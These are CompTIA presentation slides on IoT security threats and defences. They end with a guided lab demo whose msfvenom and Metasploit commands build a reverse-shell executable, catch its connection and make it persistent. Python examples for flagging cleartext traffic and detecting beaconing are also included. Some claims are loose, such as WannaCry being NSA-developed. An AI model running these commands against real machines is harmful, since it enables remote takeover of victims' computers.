Protecting your Organisation from the Internet of Evil Things


Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

The Voice of the World’s IT Industry and over 1.5 million IT Professionals

CERTIFICATIONS

Largest Provider of Vendor-Neutral IT Certifications

✓ Higher Salaries ✓ Growing Demand ✓ Verified Strengths ✓ Universal Skills

“Three of the ‘Top 10 Certifications That Help IT Workers Get Jobs’ are CompTIA certifications.”*

ASSOCIATION

4,000+ IT Channel Providers & Partners

A non-profit trade association with more than 4,000 members and business partners. Our members drive our programs through their participation in CompTIA communities, research studies, events, sharing of best practices and more.

PHILANTHROPY

Creating IT Futures Foundation

A 501(c)(3) charitable organization that creates on-ramps for successful IT careers, serving individuals who are underrepresented in IT and lacking in opportunities to be successful in IT, including veterans, youth, and the unemployed.

ADVOCACY

Public Policy & Reform

Our advocacy division encourages collaboration and advancing of legislation that allows the private sector to develop new products and services, find solutions and sell them in the global marketplace.

* Source: The Dice Report, February 2012


Zeshan Sattar

From Cybernetics to Cybersecurity

2004

• BSc Cybernetics & Virtual Worlds

• IT Support Tech, UK & Japan

2007

• Systems Administrator

• Technical Trainer, Europe

2013

• IT Expert Consultant, Worldwide

• Head of Curriculum

2015

• Certification Evangelist


Agenda

▪ Introduction

▪ What is IoT?

▪ What is IoET?

▪ Examples of Cyber attacks

▪ Human error

▪ CompTIA certifications

▪ Guided Demo: Compromising a Windows client


What is the Internet of Things?

The Internet of Things (IoT) is the inter-networking of physical devices, vehicles (also referred to as "connected devices" and "smart devices")

Which simply means…


Everything Has Become Connected

[Diagram labels: The Internet; Smart Car, Smart Suit, Smart House, Tablet, Smart Phone, Desktop/Laptop, Smart Shoes, Internet CCTV, Smart Watch, Smart Cities]


What is the Internet of Things?

▪ The main problem is that because the idea of networking appliances and other objects is relatively new, security has not always been considered in product design.

▪ Consumers often fail to change the default passwords on smart devices or, if they do change them, fail to select sufficiently strong passwords.


The Concerns

▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security, permissions and encryption

▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security & authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.

▪ Application-level security:

– Default admin passwords

– Weak passwords

– Not using encryption over the network

– Open ports.

▪ Protocol-level security:

– Wireless protocols such as ZigBee & Bluetooth


The Internet of Evil Things


What is the Internet of Evil Things?

▪ It is the Internet of Things but used in a negative way to hurt you.

▪ By detecting vulnerabilities, attackers can control your:

– Car, house, phone, computer

– Your identity can be stolen, you can be killed, you can be blackmailed

– You can end up in jail because of an attack that took place while you were asleep


Examples of IoT devices


The accessible IoT devices


The Problems?

▪ Limited CPU on devices

▪ Encryption & identity keys

▪ New devices with new OS/software

▪ Too much network traffic

▪ Wi-Fi connected home appliances

▪ GUI & Internet Browsers

▪ Hardware Trojans


Cyber Attack Examples


What is Mirai?

▪ Mirai is the Japanese word for Future.

▪ In IT, it is malware that attacks out-of-date Linux devices remotely

▪ It takes control of the devices and turns them into a botnet for further attacks

▪ It scans the internet looking for IP addresses of IoT devices.

▪ Some of the popular websites affected were: GitHub, Twitter, Reddit, Netflix, Airbnb

▪ BASHLITE is another malware that performs a DDoS attack on Linux systems


More about Mirai

▪ On the 21st of October 2016, a Mirai-fueled zombie botnet army was deployed against Dyn.

▪ Dyn is one of the world’s largest DNS providers

▪ The attack resulted in taking down internet access in many of America’s largest cities.

▪ Mirai gave us a view of how the IoT can turn into an IoET by controlling many devices and maybe shutting them down


Mirai – one year on…

▪ 66% of IT Pros said they either haven’t checked or don’t know how to check their devices for Mirai

▪ 20% said their IoT devices were hit with ransomware attacks last year.

▪ 16% of respondents say they experienced man-in-the-middle attacks through IoT devices.

▪ 23% of IT security professionals monitor connected devices coming into their offices


Source: Pwnie Express


The Onion Routing (TOR)

▪ Onion routing is a technique for anonymous communication over a computer network. In an onion network, messages are encapsulated in layers of encryption, analogous to layers of an onion. ... When the final layer is decrypted, the message arrives at its destination.

▪ Tor aims to conceal its users' identities and their online activity from surveillance and traffic analysis by separating identification and routing.

▪ It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe


Ransomware


Steps to Ransomware

1. Infected file or Email link to a page

2. User redirected to Site

3. File Downloaded to the system

4. File Installed

5. User Data Encrypted

6. Pay or Pay


WannaCry

▪ WannaCry Ransomware

▪ One of the most widely spread malware strains

▪ Developed by the NSA “Eternal Blue”

▪ Supposedly weaponized by North Korea

▪ This Ransomware is still spreading


Top 10 IoT Vulnerabilities

1. Insecure Web Interface

2. Insufficient Authentication/Authorization

3. Insecure Network Services

4. Lack of Transport Encryption/Integrity Verification

5. Privacy Concerns

6. Insecure Cloud Interface

7. Insecure Mobile Interface

8. Insufficient Security Configurability

9. Insecure Software/Firmware

10. Poor Physical Security


Source: OWASP


Shodan.io


Some Dangerous Apps


▪ Flashlight

▪ Tinder

▪ Snapchat

▪ Blendr

▪ Whisper

▪ Yik Yak

▪ Poof

▪ Omegle

▪ Clean it

▪ Deep Clean

▪ Flappy Cat

▪ Light VPN

▪ DU battery Saver & Fast Charge


▪ Lazy Listen audiobook

▪ Kik Messenger

▪ Whatsapp Bomber

▪ Quick Pic

▪ ES File Explorer

▪ UC Browser

▪ Dolphin Web Browser

▪ Clean Master

▪ Whale Camera

▪ Blinking Camera

▪ File Master

▪ Art Camera


How would a HACKER use IoT against you?


Hacking Steps

1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Covering Tracks

To protect against a hacker, you have to think like a hacker


How would a HACKER use IoT against you?

▪ Blackmail

– What Happened?

▪ Identity Theft / 419 Scam

– Why do they need it?

▪ Phishing

– What info are they looking for?

▪ Health Reports

– What do they do with it?


Quick Tip


The Solutions?

▪ IoT security opens new gates for security professionals to develop security solutions

▪ Network Security:

– How many devices transfer unencrypted data?

– What are these devices?

– Which are most active?

▪ User Security:

– Do you need that software?

– Is it trustworthy?

– Is it from the vendor?
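
The three Network Security questions above can be answered from flow records. The following Python script is an added example, not part of the original slides; the device inventory, the CSV flow format, the addresses and the list of cleartext ports are all constructed assumptions.

```python
import csv
import io
from collections import defaultdict

# Cleartext services by destination port (assumed policy list; extend it for your network).
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http", 554: "rtsp", 1883: "mqtt"}

# Constructed sample data: a device inventory and flow records exported as CSV.
INVENTORY = {
    "192.168.2.21": "IP camera (lobby)",
    "192.168.2.22": "Smart TV (boardroom)",
    "192.168.2.23": "Badge reader",
}
FLOWS_CSV = """src_ip,dst_ip,dst_port,bytes
192.168.2.21,203.0.113.5,554,48000
192.168.2.21,203.0.113.5,443,1200
192.168.2.22,198.51.100.7,443,90000
192.168.2.22,198.51.100.9,80,2500
192.168.2.23,192.168.2.1,8883,700
192.168.2.99,203.0.113.77,23,300
"""

def summarize(flows_csv):
    """Aggregate per-source byte totals and the cleartext services each source used."""
    stats = defaultdict(lambda: {"bytes": 0, "cleartext_bytes": 0, "services": set()})
    for row in csv.DictReader(io.StringIO(flows_csv)):
        entry = stats[row["src_ip"]]
        size, port = int(row["bytes"]), int(row["dst_port"])
        entry["bytes"] += size
        if port in CLEARTEXT_PORTS:
            entry["cleartext_bytes"] += size
            entry["services"].add(CLEARTEXT_PORTS[port])
    return dict(stats)

def unencrypted_devices(stats):
    """Question 1: which devices transfer data over cleartext protocols?"""
    return sorted(ip for ip, s in stats.items() if s["cleartext_bytes"] > 0)

def identify(ip, inventory=INVENTORY):
    """Question 2: what is the device? Unknown sources are flagged for follow-up."""
    return inventory.get(ip, "UNKNOWN - not in inventory")

def most_active(stats, top=3):
    """Question 3: which devices move the most data?"""
    return sorted(stats, key=lambda ip: stats[ip]["bytes"], reverse=True)[:top]

if __name__ == "__main__":
    stats = summarize(FLOWS_CSV)
    for ip in unencrypted_devices(stats):
        s = stats[ip]
        print(f"{ip:15} {identify(ip):28} cleartext={s['cleartext_bytes']}B via {sorted(s['services'])}")
    print("most active:", [(ip, stats[ip]["bytes"]) for ip in most_active(stats)])
```

A source that sends cleartext traffic and is missing from the inventory, like 192.168.2.99 in the sample, is the first one to investigate.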


IoT attacks in different sectors

[Bar chart. Labels: Consumer, Commercial, Medical, Security Issues, IoT; series: 2010, 2015, 2020; vertical axis: 0 to 100, in billions]


Top 5 Reasons for IoT attacks

1. Low security awareness

2. Weak Password Security

3. Careless handling of data

4. Inadequate software security

5. Ineffective data access management


End User awareness is critical


Ensuring our IT Professionals are equipped with the right skills


• DoS: A+, Network+, Security+, Linux+, CSA+

• Android: A+, Network+, Linux+, Security+, CASP

• SQL Injection: A+, Network+, Server+, Security+, Linux+

• Wi-Fi: Network+, Security+, CASP, Linux+

• Virus Attacks: A+, Network+, Security+, CSA+, CASP, Linux+


Guided Demo of an Attack

▪ How can you simulate this at home?

– Virtualization Software (Hyper-V, VMware Player, VirtualBox)

– Kali Linux

– Windows client

– Tip: set up a Windows Server VM to provide DHCP to the virtual network and use an isolated VM network

The attack performed here is for Demonstration, Awareness and Educational purposes. Performing the same is at your own Risk.


Commands to the demo (1/3)

▪ On the Kali Linux VM, open a terminal window and type the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe

▪ This command creates the exploit.exe and stores it in the Home folder ready for you to distribute to the victims (USB, email, web link etc.)

▪ The IP address is that of your Kali VM

▪ Then launch Metasploit by typing the following command:

msfconsole


Commands to the demo (2/3)

▪ Now, we will configure the Kali VM to listen for the user to launch the exploit, by typing:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.2.10

set LPORT 4444

exploit -j -z

▪ Your Kali VM is now ready for the attack to happen. On your Windows client, double-click exploit.exe

▪ You will notice that the Kali VM receives the connection


Commands to the demo (3/3)

▪ We can now interact with the connecting machine by typing:

sessions -i 1

▪ We want to ensure that if the user logs off/restarts the machine, we can reconnect. This can be done by adding persistence:

run persistence -U -i 5 -p 4444 -r 192.168.2.10

▪ We now have full control of the system and can carry out various commands. The commands that you can use can be viewed by typing:

help

▪ Enjoy hacking!
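
Seen from the network, the persistence step in this demo is what gives the compromise away: with -i 5 the agent retries its connection to the handler at 192.168.2.10:4444 at a fixed interval. The following Python detector is an added example for the defending side, not part of the original slides; the log format, the client address 192.168.2.50 and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed firewall log (timestamp, source, destination, destination port).
# The lab client retries the demo's handler every 5 s; the other host browses irregularly.
LOG = """\
2017-11-02T10:00:00 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:05 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:07 192.168.2.51 198.51.100.7 443
2017-11-02T10:00:09 192.168.2.51 198.51.100.7 443
2017-11-02T10:00:10 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:15 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:20 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:25 192.168.2.50 192.168.2.10 4444
2017-11-02T10:00:31 192.168.2.51 198.51.100.7 443
2017-11-02T10:00:32 192.168.2.51 198.51.100.7 443
2017-11-02T10:00:58 192.168.2.51 198.51.100.7 443
"""

def find_beacons(log, min_events=5, max_jitter=0.1):
    """Return (src, dst, port, mean_gap_seconds) for flows whose connection
    attempts are evenly spaced: stdev of the gaps <= max_jitter * mean gap."""
    seen = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, src, dst, port = parts
        seen[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    hits = []
    for (src, dst, port), times in seen.items():
        if len(times) < min_events:
            continue  # too few attempts to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) <= max_jitter * avg:
            hits.append((src, dst, port, avg))
    return hits

if __name__ == "__main__":
    for src, dst, port, gap in find_beacons(LOG):
        print(f"possible beacon: {src} -> {dst}:{port} every {gap:.1f}s")
```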


Any Questions?


Thank you for your time!

Zeshan Sattar

Let’s connect!

Twitter: @zeshandotcom

LinkedIn: https://www.linkedin.com/in/zeshandotcom/